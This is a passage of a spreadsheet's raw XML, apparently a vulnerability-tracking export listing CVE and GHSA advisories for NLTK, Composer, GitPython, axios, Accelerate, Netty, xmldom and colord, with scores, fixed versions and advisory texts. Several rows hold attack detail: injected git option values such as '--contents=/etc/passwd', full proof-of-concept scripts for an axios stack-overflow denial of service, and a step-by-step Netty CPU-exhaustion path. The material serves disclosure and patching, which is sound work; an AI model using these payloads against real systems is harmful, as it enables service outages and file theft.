NLTK versions before 3.10.0 contain a path traversal vulnerability in FramenetCorpusReader and NKJPCorpusReader that allows attackers to parse XML files outside the corpus root by supplying unsafe selectors or poisoned index state. Attackers can exploit frame_by_name, doc, lu, and header methods with crafted parameters to read arbitrary XML files accessible to the application.</t></is></c><c r="S54" s="6" t="inlineStr"><is><t>https://github.com/advisories/GHSA-qp76-pq9f-gr9m</t></is></c></row><row r="55"><c r="A55" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B55" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C55" s="5" t="inlineStr"><is><t>CVE-2026-84361</t></is></c><c r="D55" s="5" t="n"><v>7.7</v></c><c r="E55" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F55" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="G55" s="5" t="inlineStr" /><c r="H55" s="5" t="n"><v>0.004</v></c><c r="I55" s="5" t="inlineStr" /><c r="J55" s="5" t="inlineStr" /><c r="K55" s="5" t="inlineStr" /><c r="L55" s="5" t="inlineStr"><is><t>composer:composer/composer</t></is></c><c r="M55" s="5" t="inlineStr"><is><t>2.10.3, 2.2.30</t></is></c><c r="N55" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="O55" s="5" t="inlineStr" /><c r="P55" s="5" t="inlineStr" /><c r="Q55" s="5" t="inlineStr"><is><t>CWE-78</t></is></c><c r="R55" s="5" t="inlineStr"><is><t>## Summary

If the `p4` Perforce CLI client is installed, a malicious dependency package from a package repository allowing arbitrary perforce source URLs (packagist.org is safe) could execute arbitrary commands when running `composer install` or `composer update`. Composer passed a package's Perforce source address to the `p4` CLI client without validating it. The `p4` CLI client accepts addresses that mean "run this local command" instead of "connect to this server". This is remote code execution with the privileges of the user or CI account running Composer.

## Am I affected?

You are only affected if all of the following are true:

- The Perforce `p4` command line client is installed and on the `PATH` of the machine running Composer.
- An attacker can control a package metadata's `source` section with a perforce type. Packagist.org does not allow perforce source metadata, so you are only exploitable if you rely on another Composer repository (any custom `composer`-type repository, or an inline `package` repository entry), or a `composer.lock` file you obtained from somewhere you do not trust.
- The package gets installed from source, either because it has no dist artifact or because source installs are selected (for example `--prefer-source`).

Plainly not affected: anyone without the `p4` client installed, which is the large majority of Composer users. Perforce is an optional VCS integration. Also not affected: projects that only consume packages from Packagist.org, which does not allow Perforce source repositories and therefore cannot serve a package with a Perforce source address.

Most realistic way to get hit: a developer workstation or CI image that has Perforce tooling installed, pulling packages from a private or third party Composer repository that an attacker has compromised.

## Patched versions

Composer now validates Perforce source addresses before handing them to the `p4` client, and accepts only real network endpoints (an optional `tcp`/`ssl` transport with a host and port). Addresses that make the client spawn a local process are rejected, and the package fails validation on both update and install, before any `p4` command runs. Fixed in Composer **2.10.3** and **2.2.30**.

Note: If you legitimately use Perforce with an unusual `P4PORT` value that is not a plain host and port, Composer will now reject it.

## Workarounds

Upgrading is the only complete fix.

Risk reduction short of upgrading:

- Remove the `p4` client from the `PATH` of machines that run Composer but do not use Perforce. This fully blocks this specific attack, since the vulnerability depends on that client being present.
- Restrict configured repositories to sources you control or trust, and treat lock files from untrusted sources as untrusted input.</t></is></c><c r="S55" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84361</t></is></c></row><row r="56"><c r="A56" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B56" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C56" s="5" t="inlineStr"><is><t>GHSA-298h-jpq4-m665</t></is></c><c r="D56" s="5" t="n"><v>7.7</v></c><c r="E56" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F56" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="G56" s="5" t="inlineStr" /><c r="H56" s="5" t="inlineStr" /><c r="I56" s="5" t="inlineStr" /><c r="J56" s="5" t="inlineStr" /><c r="K56" s="5" t="inlineStr" /><c r="L56" s="5" t="inlineStr"><is><t>pip:GitPython</t></is></c><c r="M56" s="5" t="inlineStr" /><c r="N56" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="O56" s="5" t="inlineStr" /><c r="P56" s="5" t="inlineStr" /><c r="Q56" s="5" t="inlineStr"><is><t>CWE-88</t></is></c><c r="R56" s="5" t="inlineStr"><is><t>## Duplicate Advisory

This advisory has been withdrawn because it is a duplicate of GHSA-9rj7-rf2p-w77r. This link is maintained to preserve external references.

## Original Description
GitPython before 3.1.58 contains a remote code execution vulnerability in Repo.init that forwards unsafe git options without validation. Attackers can supply a template parameter pointing to a directory with malicious git hooks that execute arbitrary code when git operations are performed on the initialized repository.</t></is></c><c r="S56" s="6" t="inlineStr"><is><t>https://github.com/advisories/GHSA-298h-jpq4-m665</t></is></c></row><row r="57"><c r="A57" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B57" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C57" s="5" t="inlineStr"><is><t>GHSA-7jx3-jqcp-hhgc</t></is></c><c r="D57" s="5" t="n"><v>7.2</v></c><c r="E57" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F57" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="G57" s="5" t="inlineStr" /><c r="H57" s="5" t="inlineStr" /><c r="I57" s="5" t="inlineStr" /><c r="J57" s="5" t="inlineStr" /><c r="K57" s="5" t="inlineStr" /><c r="L57" s="5" t="inlineStr"><is><t>pip:gitpython</t></is></c><c r="M57" s="5" t="inlineStr" /><c r="N57" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="O57" s="5" t="inlineStr" /><c r="P57" s="5" t="inlineStr" /><c r="Q57" s="5" t="inlineStr"><is><t>CWE-88</t></is></c><c r="R57" s="5" t="inlineStr"><is><t>## Duplicate Advisory

This advisory has been withdrawn because it is a duplicate of GHSA-4gmw-gg2m-w46p. This link is maintained to preserve external references.

## Original Description
GitPython versions before 3.1.58 contain an arbitrary file overwrite vulnerability in IndexFile.from_tree, IndexFile.reset, and IndexFile.merge_tree methods that append caller-influenced treeish strings to git read-tree without option validation or argument separation. Attackers can inject the --index-output option to overwrite arbitrary files with a valid git-index blob, destroying existing file content at attacker-controlled writable paths.</t></is></c><c r="S57" s="6" t="inlineStr"><is><t>https://github.com/advisories/GHSA-7jx3-jqcp-hhgc</t></is></c></row><row r="58"><c r="A58" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B58" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C58" s="5" t="inlineStr"><is><t>GHSA-6rj2-96f5-chj9</t></is></c><c r="D58" s="5" t="n"><v>7.1</v></c><c r="E58" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F58" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="G58" s="5" t="inlineStr" /><c r="H58" s="5" t="inlineStr" /><c r="I58" s="5" t="inlineStr" /><c r="J58" s="5" t="inlineStr" /><c r="K58" s="5" t="inlineStr" /><c r="L58" s="5" t="inlineStr"><is><t>pip:GitPython</t></is></c><c r="M58" s="5" t="inlineStr" /><c r="N58" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="O58" s="5" t="inlineStr" /><c r="P58" s="5" t="inlineStr" /><c r="Q58" s="5" t="inlineStr"><is><t>CWE-73</t></is></c><c r="R58" s="5" t="inlineStr"><is><t>## Duplicate Advisory

This advisory has been withdrawn because it is a duplicate of GHSA-3wxw-xv34-2frg. This link is maintained to preserve external references.

## Original Description
GitPython before 3.1.59 contains an arbitrary file read vulnerability in TagReference.create() where a positional reference parameter bypasses the unsafe option guard. Attackers can supply a reference value like --file=&lt;path&gt; to read arbitrary files, with contents returned in the annotated tag message.</t></is></c><c r="S58" s="6" t="inlineStr"><is><t>https://github.com/advisories/GHSA-6rj2-96f5-chj9</t></is></c></row><row r="59"><c r="A59" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B59" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C59" s="5" t="inlineStr"><is><t>GHSA-89ff-m8wv-p99r</t></is></c><c r="D59" s="5" t="n"><v>7.1</v></c><c r="E59" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F59" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="G59" s="5" t="inlineStr" /><c r="H59" s="5" t="inlineStr" /><c r="I59" s="5" t="inlineStr" /><c r="J59" s="5" t="inlineStr" /><c r="K59" s="5" t="inlineStr" /><c r="L59" s="5" t="inlineStr"><is><t>pip:gitpython</t></is></c><c r="M59" s="5" t="inlineStr" /><c r="N59" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="O59" s="5" t="inlineStr" /><c r="P59" s="5" t="inlineStr" /><c r="Q59" s="5" t="inlineStr"><is><t>CWE-88</t></is></c><c r="R59" s="5" t="inlineStr"><is><t>## Duplicate Advisory

This advisory has been withdrawn because it is a duplicate of GHSA-5xxx-qhh7-9287. This link is maintained to preserve external references.

## Original Description
GitPython versions before 3.1.59 contain an incomplete denylist in the unsafe_git_revision_options guard that omits --contents and -S options, allowing attackers to read arbitrary files by passing these options to Repo.blame(). Attackers can supply revision values like --contents=/etc/passwd to leak file contents through the blame result returned to the caller.</t></is></c><c r="S59" s="6" t="inlineStr"><is><t>https://github.com/advisories/GHSA-89ff-m8wv-p99r</t></is></c></row><row r="60"><c r="A60" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B60" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C60" s="5" t="inlineStr"><is><t>GHSA-w672-239g-c3gr</t></is></c><c r="D60" s="5" t="n"><v>7.1</v></c><c r="E60" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F60" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="G60" s="5" t="inlineStr" /><c r="H60" s="5" t="inlineStr" /><c r="I60" s="5" t="inlineStr" /><c r="J60" s="5" t="inlineStr" /><c r="K60" s="5" t="inlineStr" /><c r="L60" s="5" t="inlineStr"><is><t>pip:gitpython</t></is></c><c r="M60" s="5" t="inlineStr" /><c r="N60" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="O60" s="5" t="inlineStr" /><c r="P60" s="5" t="inlineStr" /><c r="Q60" s="5" t="inlineStr"><is><t>CWE-73</t></is></c><c r="R60" s="5" t="inlineStr"><is><t>## Duplicate Advisory

This advisory has been withdrawn because it is a duplicate of GHSA-hh9p-6wh2-4mfc. This link is maintained to preserve external references.

## Original Description
GitPython versions before 3.1.58 fail to validate options passed to git rm and git checkout commands in IndexFile.remove() and Head.checkout(). Attackers can supply --pathspec-from-file and --pathspec-file-nul parameters to read arbitrary files accessible to the process, with full file contents returned in GitCommandError.stderr.</t></is></c><c r="S60" s="6" t="inlineStr"><is><t>https://github.com/advisories/GHSA-w672-239g-c3gr</t></is></c></row><row r="61"><c r="A61" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B61" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C61" s="5" t="inlineStr"><is><t>CVE-2026-67321</t></is></c><c r="D61" s="5" t="n"><v>6.9</v></c><c r="E61" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F61" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="G61" s="5" t="inlineStr" /><c r="H61" s="5" t="n"><v>0.004</v></c><c r="I61" s="5" t="inlineStr" /><c r="J61" s="5" t="inlineStr" /><c r="K61" s="5" t="inlineStr" /><c r="L61" s="5" t="inlineStr"><is><t>npm:axios</t></is></c><c r="M61" s="5" t="inlineStr"><is><t>0.33.0, 1.18.0</t></is></c><c r="N61" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="O61" s="5" t="inlineStr" /><c r="P61" s="5" t="inlineStr" /><c r="Q61" s="5" t="inlineStr"><is><t>CWE-674</t></is></c><c r="R61" s="5" t="inlineStr"><is><t>## Summary

Axios versions in the fixed lines for GHSA-62hf-57xw-28j9 still contain an incomplete depth-limit bypass in `lib/helpers/toFormData.js`. When serializing an object with a top-level key ending in `{}`, axios calls `JSON.stringify()` on that value before the `formSerializer.maxDepth` guard can inspect the nested structure.

An attacker who can control object keys and nested values passed by an application into axios form or parameter serialization can trigger a raw `RangeError: Maximum call stack size exceeded`, causing a denial of service in the affected request path.

## Impact

The impact is availability only. No confidentiality or integrity impact was confirmed.

Server-side applications are the primary concern when they accept user-controlled input and pass it into axios as `data` or `params` for `multipart/form-data`, `application/x-www-form-urlencoded`, or default parameter serialization. Browser impact is limited to the page or request context unless the application builds a broader failure mode around the thrown exception.

The attack requires control over a top-level object key ending in `{}` and a deeply nested object value. The option `formSerializer.metaTokens: false` is not a workaround because it only changes the emitted key name; the value is still stringified.

## Affected Functionality

Affected paths include:

- `lib/helpers/toFormData.js` when a top-level key ends with `{}`.
- `lib/helpers/toURLEncodedForm.js`, which delegates to `helpers.defaultVisitor`.
- `lib/helpers/AxiosURLSearchParams.js`, used by default params serialization.
- Request transforms in `lib/defaults/index.js` when object data is serialized as `multipart/form-data` or `application/x-www-form-urlencoded`.

Unaffected paths include:

- Already-created `FormData` or `URLSearchParams` values that axios does not walk with `toFormData`.
- Custom `paramsSerializer.serialize` implementations that do not call axios `toFormData`.
- Non-`{}` deeply nested values in `toFormData`, which hit `ERR_FORM_DATA_DEPTH_EXCEEDED` as intended.

## Technical Details

In `lib/helpers/toFormData.js`, `defaultVisitor()` handles top-level keys ending in `{}` before recursive traversal:

```js
if (value &amp;&amp; !path &amp;&amp; typeof value === 'object') {
  if (utils.endsWith(key, '{}')) {
    key = metaTokens ? key : key.slice(0, -2);
    value = JSON.stringify(value);
  }
}
```

The depth guard is in `build()`:

```js
if (depth &gt; maxDepth) {
  throw new AxiosError(
    'Object is too deeply nested (' + depth + ' levels). Max depth: ' + maxDepth,
    AxiosError.ERR_FORM_DATA_DEPTH_EXCEEDED
  );
}
```

For `{}` metatoken values, `build()` only sees the top-level property. The nested value is handed directly to native `JSON.stringify()`, which recurses internally and can throw `RangeError` before axios emits the intended `AxiosError`.

## Proof of Concept of Attack

Safe local PoC with no network I/O:

```js
import toFormData from './lib/helpers/toFormData.js';

function buildDeep(depth) {
  const head = {};
  let cur = head;

  for (let i = 0; i &lt; depth; i += 1) {
    cur.x = {};
    cur = cur.x;
  }

  return head;
}

try {
  toFormData({ 'evil{}': buildDeep(10000) });
} catch (err) {
  console.log(err.name, err.code || '', err.message);
}

// Expected affected result:
// RangeError  Maximum call stack size exceeded
```

Expected fixed behavior is an `AxiosError` with code `ERR_FORM_DATA_DEPTH_EXCEEDED`.

## Workarounds

Reject or depth-limit untrusted objects before passing them to axios serialization.

Strip or reject top-level keys ending in `{}` from untrusted objects when using axios form serialization.

For query parameters, use a custom `paramsSerializer.serialize` that enforces a depth limit.

For form bodies, construct `FormData` or `URLSearchParams` manually after validating input depth.

&lt;details&gt;
&lt;summary&gt;Original Report&lt;/summary&gt;

## Summary
The `maxDepth=100` guard added in axios 1.15.0 to fix GHSA-62hf-57xw-28j9 lives inside the `build()` recursion in `lib/helpers/toFormData.js`. The default visitor at `lib/helpers/toFormData.js:166-170` still has a top-level shortcut that calls `JSON.stringify(value)` whenever a key ends in `'{}'`, before `build()` ever sees the nested value. JSON.stringify on a deeply nested object stack-overflows with `RangeError: Maximum call stack size exceeded`, which propagates synchronously out of the axios call. The exact attacker-data flow that the original advisory described (proxy-style code that forwards client JSON into `axios({ data, params })`) still crashes the process at depth ~3000 on a default Node.js stack, despite v1.16.0 being patched.

## Details
Affected: axios 1.15.0 - 1.16.0 (every released version that carries the GHSA-62hf-57xw-28j9 fix). The bug is reachable from any code path that hits `toFormData`, which includes:

- `axios.post(url, data, { headers: { 'content-type': 'application/x-www-form-urlencoded' } })` -&gt; `defaults.transformRequest` -&gt; `toURLEncodedForm(data)` -&gt; `toFormData`
- `axios.post(url, data, { headers: { 'content-type': 'multipart/form-data' } })` -&gt; same path via `toFormData`
- `axios.get(url, { params })` -&gt; `buildURL` -&gt; `new AxiosURLSearchParams(params)` -&gt; `toFormData`

Vulnerable code, `lib/helpers/toFormData.js`:

```javascript
// 156 function defaultVisitor(value, key, path) {
// 165 if (value &amp;&amp; !path &amp;&amp; typeof value === 'object') {
// 166 if (utils.endsWith(key, '{}')) {
// 167 // eslint-disable-next-line no-param-reassign
// 168 key = metaTokens ? key : key.slice(0, -2);
// 169 // eslint-disable-next-line no-param-reassign
// 170 value = JSON.stringify(value); // &lt;-- V8 native, NOT depth-checked
// 171 } else if (...
```

`build()` later does enforce `maxDepth`:

```javascript
// 211 function build(value, path, depth = 0) {
// 212 if (utils.isUndefined(value)) return;
// 213
// 214 if (depth &gt; maxDepth) {
// 215 throw new AxiosError(
// 216 'Object is too deeply nested (' + depth + ' levels). Max depth: ' + maxDepth,
// 217 AxiosError.ERR_FORM_DATA_DEPTH_EXCEEDED
// 218 );
```

The `'{}'` shortcut runs in `defaultVisitor`, which is invoked from inside `build()` for top-level keys (the `!path` clause at line 165 means the shortcut only triggers at top level, where `path` is `undefined`). At that point `depth === 0` and the maxDepth check has already passed; the recursion-aware guard never sees the nested value because `defaultVisitor` reassigns `value = JSON.stringify(value)` and returns the rendered string straight to `formData.append`. JSON.stringify itself is recursive in V8 and stack-overflows on deeply nested objects, throwing `RangeError` synchronously.

The behaviour is independent of the `metaTokens` option: line 168 only changes whether `'{}'` stays on the key name, line 170 stringifies regardless. `toURLEncodedForm`'s wrapper visitor in `lib/helpers/toURLEncodedForm.js:11-14` falls through to the same `defaultVisitor`, so the form-encoded path is also affected.

The attacker payload is a single top-level key ending in `'{}'` whose value is a nested object. The keys themselves do not have to be deep, so the payload is small to send (a few KB of `{"x":{"x":...}}` produces enough nesting to overflow). The original advisory's threat model -- a server that forwards `req.body` or `req.query` into axios -- is unchanged:

```javascript
app.post('/forward', async (req, res) =&gt; {
 await axios.post('https://upstream/api', req.body); // req.body attacker-controlled
 res.send('ok');
});
// attacker POST /forward with content-type: application/x-www-form-urlencoded
// body: {"evil{}": &lt;8000-deep object&gt;}
// -&gt; JSON.stringify recurses inside defaultVisitor -&gt; RangeError -&gt; handler crashes
```

The error is not an `AxiosError`; it is a raw `RangeError` thrown from the stringifier, so handlers that look for `err.code === 'ERR_FORM_DATA_DEPTH_EXCEEDED'` (the documented signal that the maxDepth guard fired) do not see it. Synchronous startup paths or worker threads still take the whole process down.

The fix is to also depth-limit (or pre-walk) the value before calling `JSON.stringify` on line 170, or to remove the top-level `'{}'` shortcut and rely on the depth-checked `build()` recursion to handle it. A minimal patch that preserves observable behaviour for legal payloads:

```diff
 if (utils.endsWith(key, '{}')) {
 // eslint-disable-next-line no-param-reassign
 key = metaTokens ? key : key.slice(0, -2);
+ // Reject objects that would exceed maxDepth before handing to JSON.stringify,
+ // which is recursive in V8 and stack-overflows on deeply nested input.
+ (function checkDepth(v, d) {
+ if (d &gt; maxDepth) {
+ throw new AxiosError(
+ 'Object is too deeply nested (' + d + ' levels). Max depth: ' + maxDepth,
+ AxiosError.ERR_FORM_DATA_DEPTH_EXCEEDED
+ );
+ }
+ if (v &amp;&amp; typeof v === 'object') {
+ for (const k in v) checkDepth(v[k], d + 1);
+ }
+ })(value, 0);
 // eslint-disable-next-line no-param-reassign
 value = JSON.stringify(value);
 }
```

(The recursion in `checkDepth` itself is bounded by `maxDepth`, so it cannot itself overflow.)

## PoC
Reproduces against a clean clone of `axios/axios` at v1.16.0 with `npm install` already run. `targets/axios/poc_jsonstringify_dos.mjs` is the script:

```javascript
import axios from './source/index.js';

function buildDeep(depth) {
 let head = {};
 let cur = head;
 for (let i = 0; i &lt; depth; i++) { cur.x = {}; cur = cur.x; }
 return head;
}

const malicious = buildDeep(5000);
const safeAdapter = () =&gt; Promise.resolve({
 data: 'never reached', status: 200, statusText: 'OK', headers: {}, config: {}
});

// 1. POST x-www-form-urlencoded
try {
 await axios.post('http://example.test/x',
 { 'evil{}': malicious },
 { headers: { 'content-type': 'application/x-www-form-urlencoded' }, adapter: safeAdapter });
} catch (e) {
 console.log('POST form-encoded:', e.name, '-', e.message);
}

// 2. GET with params
try {
 await axios.get('http://example.test/x',
 { params: { 'evil{}': malicious }, adapter: safeAdapter });
} catch (e) {
 console.log('GET params:', e.name, '-', e.message);
}
```

3/3 runs reproduce the same `RangeError` on `axios@1.16.0` with Node.js 24:

```
$ node poc_jsonstringify_dos.mjs
POST form-encoded: RangeError - Maximum call stack size exceeded
GET params: RangeError - Maximum call stack size exceeded
```

`safeAdapter` is a stub that returns a fake response, so the crash is provably inside axios's serialization layer, not in HTTP I/O. Removing the `'{}'` suffix from the key and re-running gives the expected `AxiosError: Object is too deeply nested ... ERR_FORM_DATA_DEPTH_EXCEEDED` from the maxDepth guard, confirming the fix is wired correctly elsewhere -- it just does not cover this branch.

Crash threshold on a default-stack Node.js process is roughly depth 2500-3000; 8000 is comfortably above that, and the payload is a few KB.

## Impact
A remote, unauthenticated attacker who can influence an object that the application passes to axios as request `data` or `params` triggers an uncaught `RangeError` from inside the synchronous `JSON.stringify` call in `defaultVisitor`. In server-side applications that proxy or re-forward client JSON through axios -- the same threat model that motivated GHSA-62hf-57xw-28j9 -- this crashes the request handler and, in worker/cluster setups, the whole process. The previously shipped `maxDepth` guard does not stop it because the `'{}'` suffix path bypasses `build()` entirely. Same severity class as the original advisory (CWE-674 Uncontrolled Recursion, network-reachable DoS); the only difference is the attacker has to suffix one of their object keys with `'{}'` to land on the unguarded code path.
&lt;/details&gt;

---</t></is></c><c r="S61" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-67321</t></is></c></row><row r="62"><c r="A62" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B62" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C62" s="5" t="inlineStr"><is><t>CVE-2026-69112</t></is></c><c r="D62" s="5" t="n"><v>6.9</v></c><c r="E62" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F62" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="G62" s="5" t="inlineStr" /><c r="H62" s="5" t="n"><v>0.001</v></c><c r="I62" s="5" t="inlineStr" /><c r="J62" s="5" t="inlineStr" /><c r="K62" s="5" t="inlineStr" /><c r="L62" s="5" t="inlineStr"><is><t>pip:accelerate</t></is></c><c r="M62" s="5" t="inlineStr" /><c r="N62" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="O62" s="5" t="inlineStr" /><c r="P62" s="5" t="inlineStr" /><c r="Q62" s="5" t="inlineStr"><is><t>CWE-22</t></is></c><c r="R62" s="5" t="inlineStr"><is><t>Hugging Face Accelerate through 1.14.0 contains a path traversal vulnerability in load_checkpoint_in_model and load_checkpoint_and_dispatch functions that fail to sanitize weight_map entries from sharded checkpoint indexes. Attackers can supply relative paths with ../ sequences or absolute paths to read arbitrary files, or point shard entries at named pipes to cause indefinite blocking and denial of service.</t></is></c><c r="S62" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69112</t></is></c></row><row r="63"><c r="A63" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B63" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C63" s="5" t="inlineStr"><is><t>CVE-2026-75596</t></is></c><c r="D63" s="5" t="n"><v>6.9</v></c><c r="E63" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F63" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="G63" s="5" t="inlineStr" /><c r="H63" s="5" t="n"><v>0.004</v></c><c r="I63" s="5" t="inlineStr" /><c r="J63" s="5" t="inlineStr" /><c r="K63" s="5" t="inlineStr" /><c r="L63" s="5" t="inlineStr"><is><t>maven:io.netty:netty-handler</t></is></c><c r="M63" s="5" t="inlineStr"><is><t>4.1.137.Final, 4.2.17.Final</t></is></c><c r="N63" s="5" t="inlineStr"><is><t>GHSA, OSV</t></is></c><c r="O63" s="5" t="inlineStr" /><c r="P63" s="5" t="inlineStr" /><c r="Q63" s="5" t="inlineStr"><is><t>CWE-407</t></is></c><c r="R63" s="5" t="inlineStr"><is><t>### Summary

Netty's default SNI entrypoint reparses and recopies previously received ClientHello fragments on every additional TLS handshake record. A remote peer can send a small first record that advertises a large ClientHello length and then drip the body in many tiny records, causing **superlinear (quadratic) CPU work** before the handshake completes. With 4095 one-byte fragments, the handler recopies **8,386,560 bytes** from only **24,579 bytes** on the wire — a **341× amplification** ratio.

### Affected Entrypoints

- `io.netty.handler.ssl.SniHandler` — default constructors
- `io.netty.handler.ssl.SslClientHelloHandler` — pre-handshake ClientHello aggregation path

### Vulnerable Code Locations

- `handler/src/main/java/io/netty/handler/ssl/SniHandler.java:85`
- `handler/src/main/java/io/netty/handler/ssl/SslClientHelloHandler.java:75` (decode entry)
- `handler/src/main/java/io/netty/handler/ssl/SslClientHelloHandler.java:165` (handshakeBuffer.clear)
- `handler/src/main/java/io/netty/handler/ssl/SslClientHelloHandler.java:174` (writeBytes re-copy)
- `codec-base/src/main/java/io/netty/handler/codec/ByteToMessageDecoder.java:294` (cumulation retention)

### Exploit Path

```
1. TCP connection → SniHandler → SslClientHelloHandler.decode
2. First record: TLS handshake header declaring large ClientHello length (e.g., 4096 bytes)
3. Attacker sends thousands of tiny follow-on handshake records (1 byte each)
4. On each fragment: handshakeBuffer.clear() + writeBytes() re-copies ALL accumulated body bytes
5. Total bytes copied = n*(n+1)/2 where n = number of body bytes → quadratic
6. Event-loop CPU exhausted before SslHandler takes over
```

### Impact

- **Vulnerability Type:** Inefficient Algorithmic Complexity
- An unauthenticated network attacker can drive disproportionate CPU consumption on the Netty event loop
- Affects **all** Netty deployments using `SniHandler` for TLS termination (the default SNI path)
- No privileges, user interaction, or special configuration required
- Can degrade or stall TLS connection handling for all clients on the affected event loop
- The attack requires only modest bandwidth (~25 KB) to trigger significant CPU work

---
### Credits

Found by a security research team from the University of Sydney, focusing on detecting open source software vulnerabilities.
Liyi Zhou: https://lzhou1110.github.io/
Ziyue Wang: https://zyy0530.github.io/
Strick: https://str1ckl4nd.github.io/
Maurice: https://maurice.busystar.org/
Chenchen Yu: https://7thparkk.github.io/</t></is></c><c r="S63" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75596</t></is></c></row><row r="64"><c r="A64" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B64" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C64" s="5" t="inlineStr"><is><t>CVE-2026-83611</t></is></c><c r="D64" s="5" t="n"><v>6.9</v></c><c r="E64" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F64" s="5" t="inlineStr"><is><t>security-advisories@github.com</t></is></c><c r="G64" s="5" t="inlineStr" /><c r="H64" s="5" t="n"><v>0.004</v></c><c r="I64" s="5" t="inlineStr" /><c r="J64" s="5" t="inlineStr" /><c r="K64" s="5" t="inlineStr" /><c r="L64" s="5" t="inlineStr"><is><t>npm:@xmldom/xmldom, npm:xmldom</t></is></c><c r="M64" s="5" t="inlineStr"><is><t>0.8.15, 0.9.12</t></is></c><c r="N64" s="5" t="inlineStr"><is><t>GHSA, NVD, OSV</t></is></c><c r="O64" s="5" t="inlineStr"><is><t>2026-09-01</t></is></c><c r="P64" s="5" t="inlineStr" /><c r="Q64" s="5" t="inlineStr"><is><t>CWE-1286</t></is></c><c r="R64" s="5" t="inlineStr"><is><t>xmldom is a pure JavaScript W3C standard-based (XML DOM Level 2 Core) DOMParser and XMLSerializer module. Prior to @xmldom/xmldom versions 0.8.15 and 0.9.12, and in xmldom version 0.6.0 and earlier, DOMParser.parseFromString() can silently accept an end tag such as &lt;/a\njunk&gt;, close the element, and discard the trailing content. On 0.9.x, the lib/sax.js end-tag validator inherits the multiline flag from reg(), allowing the first line to satisfy the anchored XML ETag production; older lines have no equivalent residue validation. This parser differential can bypass a parse-before-trust well-formedness gate, although it does not inject the discarded content; onError on 0.9.x and errorHandler on 0.8.x are the relevant reporting interfaces. This issue is fixed in @xmldom/xmldom versions 0.8.15 and 0.9.12; no fixed version is available for xmldom.</t></is></c><c r="S64" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83611</t></is></c></row><row r="65"><c r="A65" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B65" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C65" s="5" t="inlineStr"><is><t>CVE-2026-85062</t></is></c><c r="D65" s="5" t="n"><v>6.9</v></c><c r="E65" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F65" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="G65" s="5" t="inlineStr" /><c r="H65" s="5" t="n"><v>0.003</v></c><c r="I65" s="5" t="inlineStr" /><c r="J65" s="5" t="inlineStr" /><c r="K65" s="5" t="inlineStr" /><c r="L65" s="5" t="inlineStr"><is><t>npm:colord</t></is></c><c r="M65" s="5" t="inlineStr"><is><t>2.9.4</t></is></c><c r="N65" s="5" t="inlineStr"><is><t>GHSA, OSV</t></is></c><c r="O65" s="5" t="inlineStr" /><c r="P65" s="5" t="inlineStr" /><c r="Q65" s="5" t="inlineStr"><is><t>CWE-1333</t></is></c><c r="R65" s="5" t="inlineStr"><is><t>### Impact

`colord`'s CSS color string matchers described a number as `([+-]?\d*\.?\d+)`. In that form `\d*` and `\d+` can match the same digits, so a run of *n* digits can be divided between them in O(n²) ways, and rejecting an input retries every division. Parsing is synchronous and uninterruptible, so a long malformed color string blocks the thread:

| input | time to reject |
| --- | --- |
| 16 KB | 224 ms |
| 64 KB | 4.4 s |
| 128 KB | 18.5 s |

